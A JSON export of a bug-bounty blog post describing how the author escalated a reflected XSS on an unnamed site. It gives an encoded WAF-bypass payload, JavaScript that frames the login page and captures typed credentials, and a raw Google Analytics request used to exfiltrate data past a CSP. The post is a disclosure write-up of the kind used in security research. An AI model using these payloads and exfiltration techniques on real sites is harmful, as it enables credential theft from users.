{"id":520,"date":"2025-10-31T13:03:26","date_gmt":"2025-10-31T12:03:26","guid":{"rendered":"https:\/\/bergee.it\/blog\/?p=520"},"modified":"2025-11-04T06:19:59","modified_gmt":"2025-11-04T05:19:59","slug":"waf-bypass-and-credential-theft-with-xss-and-google-analytics","status":"publish","type":"post","link":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/","title":{"rendered":"WAF bypass and credential theft with XSS and Google Analytics"},"content":{"rendered":"

Hello<\/p>\n

In this post, I will tell you how I was able to escalate the bug from HTML injection to stealing credentials via Google Analytics… well, almost \ud83d\ude09
\nI was testing the website and inserted “><u>aaa<\/u> into the main search bar without big expectations.\u00a0 I was really surprised when I saw aaa.<\/u>
\nNext step was to try XSS payload <img src=”x” \/>. What I saw in response was a 403 error. No luck.<\/p>\n

Bypassing WAF<\/h3>\n

I ran Turbo Intruder in Burp, collected all HTML tags and attributes, and started fuzzing. Some HTML tags were allowed, but whenever I tried to insert some events such as “onerror’, I was always blocked with a 403 error :(.<\/p>\n

Next, I tried to bypass the WAF using special characters like %00, %0d, and %0a. Guess what? It worked \ud83d\ude42 That was the working XSS payload:<\/p>\n

<img%20src=x%20o%200nerror=alert(document%00.domain)><\/code><\/pre>\n
Ok, I could report it right away, but I decided to increase the impact. As the session cookie had the HTTP-only flag set, I could not read it with js, so I decided to steal credentials while the users logs in.<\/p>\n
Redressing the page<\/h3>\n
Suppose the search page was on:<\/p>\n
https:\/\/target.com\/search<\/pre>\n
and the login form was on:<\/p>\n
https:\/\/target.com\/login<\/pre>\n
I had to redesign the search page to resemble the login page, add listeners that capture the credentials as the user logs in, and send them to the attacker’s site. I framed the \/login endpoint into the \/search page, styled it with CSS to match the \/login endpoint’s appearance, then changed the document title to match the\/login page’s title, and finally, changed the visible URL in the browser address bar and history.pushState() command.<\/p>\n
That was the code: to iframe the \/login page and style the \/search page:<\/p>\n
\r\ndocument.body.innerHTML = \"\";\r\ndocument.body.appendChild(Object.assign(document.createElement('iframe'), { id:'frm',src: 'https:\/\/target.com\/login',style: 'position:fixed;top:0; left:0;bottom:0;right:0;width:100%;height:100%;top:0;left:0;bottom:0;right:0;border:none;margin:0;padding:0;overflow:hidden;'})); document.title=\"target.com | account login\";\r\nhistory.pushState(\"\", \"\", \"\/login\");\r\n<\/code><\/pre>\n
Now it’s time for listeners:<\/p>\n
\r\niframe=document.getElementById(\"frm\"),iframe.onload=()=>{const e=iframe.contentDocument||iframe.contentWindow.document,n=e.querySelector(\"input#loginUsername\"),o=e.querySelector(\"input#loginPassword\");n&&n.addEventListener(\"input\",(()=>{user=n?.value||\"\",console.log(\"username:\"+user)})),o&&o.addEventListener(\"input\",(()=>{pass=o?.value||\"\",console.log(\"password:\"+pass)}))};\r\n<\/code><\/pre>\n
Note, I needed to use the iframe onload event, so that the listener waits until the frame content is loaded. Otherwise, the code wasn’t working because it could not find the form fields. I prepared this POC with printing credentials on the dev console. Why?<\/p>\n
Bypassing CSP<\/h3>\n
The CSP blocked the outgoing connections, and I was unable to exfiltrate this data in any way. Without this part, they could say that it is not a vulnerability, as the attacker can’t steal the credentials. I analyzed the CSP headers and noticed that the Google Analytics URL was allowed. This way, I could use it to exfiltrate the data as a Google Analytics event name. So I googled a bit and found this blog post:<\/p>\n
https:\/\/labs.detectify.com\/how-to\/using-google-analytics-for-data-extraction\/<\/a><\/p>\n
The easiest way was to intercept the real GA\u00a0 request from my website to the GA server in Burp and change the value of the “en” parameter. This way, I\u00a0 could see the data in the GA panel as the event name. I removed all other parameters from the request here:<\/p>\n
 <\/p>\n
POST \/g\/collect?v=2&tid=&gtm=&_p=&gcd=&npa=1&dma_cps=&dma=1&cid=&ul=pl&frm=0&pscdl=noapi&_s=1&sid=&sct=1&seg=0&dl=&en=exfiltrated_data<\/strong>&_fv=1&_nsi=1&_ss=1&_ee=1&tfd=HTTP\/1.1\r\nHost: region1.google-analytics.com\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko\/20100101 Firefox\/144.0\r\nAccept: *\/*\r\nAccept-Language: pl,en-US;q=0.7,en;q=0.3\r\nAccept-Encoding: gzip, deflate, br\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: cross-site\r\nPriority: u=6\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nContent-Length: 0\r\nTe: trailers\r\nConnection: keep-alive\r\n<\/code><\/pre>\n
\"\"
\n
\nAnd this worked… partially. I mean, it was slow. While experimenting, the data appeared after one day in the GA panel. Well, I didn’t want to wait due to the possibility of duplication, so I decided to take the risk and send the report. I pointed out that creating a full working POC takes time using GA, so for now, I am providing a console.log-based POC. And they replied there, “No problem – the impact will be marked as High”. So I didn’t have to finish the full POC this time.<\/p>\n
Impact: High
\nReward: 500 USD<\/p>\n
See you next bug<\/p>\n","protected":false},"excerpt":{"rendered":"
Hello In this post, I will tell you how I was able to escalate the bug from HTML injection to stealing credentials via Google Analytics… well, almost \ud83d\ude09 I was testing the website and inserted “><u>aaa<\/u> into the main search bar without big expectations.\u00a0 I was really surprised when I saw aaa. Next step was…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,32,42,29],"tags":[],"class_list":["post-520","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii","category-bug-bounty","category-csp","category-write-up"],"yoast_head":"\nWAF bypass and credential theft with XSS and Google Analytics - Bergee's Stories on Bug Hunting<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WAF bypass and credential theft with XSS and Google Analytics - Bergee's Stories on Bug Hunting\" \/>\n<meta property=\"og:description\" content=\"Hello In this post, I will tell you how I was able to escalate the bug from HTML injection to stealing credentials via Google Analytics… well, almost \ud83d\ude09 I was testing the website and inserted “><u>aaa<\/u> into the main search bar without big expectations.\u00a0 I was really surprised when I saw aaa. Next step was...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\" \/>\n<meta property=\"og:site_name\" content=\"Bergee's Stories on Bug Hunting\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-31T12:03:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-04T05:19:59+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png\" \/>\n\t<meta property=\"og:image:width\" content=\"365\" \/>\n\t<meta property=\"og:image:height\" content=\"410\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"bergee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/bergee\" \/>\n<meta name=\"twitter:site\" content=\"@bergee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"bergee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\"},\"author\":{\"name\":\"bergee\",\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"headline\":\"WAF bypass and credential theft with XSS and Google Analytics\",\"datePublished\":\"2025-10-31T12:03:26+00:00\",\"dateModified\":\"2025-11-04T05:19:59+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\"},\"wordCount\":593,\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png\",\"articleSection\":[\"Bez kategorii\",\"bug bounty\",\"csp\",\"write-up\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\",\"url\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\",\"name\":\"WAF bypass and credential theft with XSS and Google Analytics - Bergee's Stories on Bug Hunting\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png\",\"datePublished\":\"2025-10-31T12:03:26+00:00\",\"dateModified\":\"2025-11-04T05:19:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png\",\"width\":365,\"height\":410},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/bergee.it\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WAF bypass and credential theft with XSS and Google Analytics\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/bergee.it\/blog\/#website\",\"url\":\"https:\/\/bergee.it\/blog\/\",\"name\":\"Bergee's Stories on Bug Hunting\",\"description\":\"hacking, cyber security and programming\",\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/bergee.it\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\",\"name\":\"bergee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"width\":129,\"height\":150,\"caption\":\"bergee\"},\"logo\":{\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\"},\"sameAs\":[\"http:\/\/localhost\/wordpress\",\"https:\/\/www.linkedin.com\/in\/bartlomiej-bergier\",\"https:\/\/x.com\/https:\/\/twitter.com\/bergee\"],\"url\":\"https:\/\/bergee.it\/blog\/author\/bergee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WAF bypass and credential theft with XSS and Google Analytics - Bergee's Stories on Bug Hunting","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/","og_locale":"en_US","og_type":"article","og_title":"WAF bypass and credential theft with XSS and Google Analytics - Bergee's Stories on Bug Hunting","og_description":"Hello In this post, I will tell you how I was able to escalate the bug from HTML injection to stealing credentials via Google Analytics… well, almost \ud83d\ude09 I was testing the website and inserted “><u>aaa<\/u> into the main search bar without big expectations.\u00a0 I was really surprised when I saw aaa. Next step was...","og_url":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/","og_site_name":"Bergee's Stories on Bug Hunting","article_published_time":"2025-10-31T12:03:26+00:00","article_modified_time":"2025-11-04T05:19:59+00:00","og_image":[{"width":365,"height":410,"url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png","type":"image\/png"}],"author":"bergee","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/bergee","twitter_site":"@bergee","twitter_misc":{"Written by":"bergee","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#article","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/"},"author":{"name":"bergee","@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"headline":"WAF bypass and credential theft with XSS and Google Analytics","datePublished":"2025-10-31T12:03:26+00:00","dateModified":"2025-11-04T05:19:59+00:00","mainEntityOfPage":{"@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/"},"wordCount":593,"publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"image":{"@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png","articleSection":["Bez kategorii","bug bounty","csp","write-up"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/","url":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/","name":"WAF bypass and credential theft with XSS and Google Analytics - Bergee's Stories on Bug Hunting","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage"},"image":{"@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png","datePublished":"2025-10-31T12:03:26+00:00","dateModified":"2025-11-04T05:19:59+00:00","breadcrumb":{"@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#primaryimage","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2025\/10\/Zrzut-ekranu-2025-11-04-060941.png","width":365,"height":410},{"@type":"BreadcrumbList","@id":"https:\/\/bergee.it\/blog\/waf-bypass-and-credential-theft-with-xss-and-google-analytics\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bergee.it\/blog\/"},{"@type":"ListItem","position":2,"name":"WAF bypass and credential theft with XSS and Google Analytics"}]},{"@type":"WebSite","@id":"https:\/\/bergee.it\/blog\/#website","url":"https:\/\/bergee.it\/blog\/","name":"Bergee's Stories on Bug Hunting","description":"hacking, cyber security and programming","publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bergee.it\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73","name":"bergee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","width":129,"height":150,"caption":"bergee"},"logo":{"@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png"},"sameAs":["http:\/\/localhost\/wordpress","https:\/\/www.linkedin.com\/in\/bartlomiej-bergier","https:\/\/x.com\/https:\/\/twitter.com\/bergee"],"url":"https:\/\/bergee.it\/blog\/author\/bergee\/"}]}},"_links":{"self":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/comments?post=520"}],"version-history":[{"count":15,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/520\/revisions"}],"predecessor-version":[{"id":537,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/520\/revisions\/537"}],"wp:attachment":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/media?parent=520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/categories?post=520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/tags?post=520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}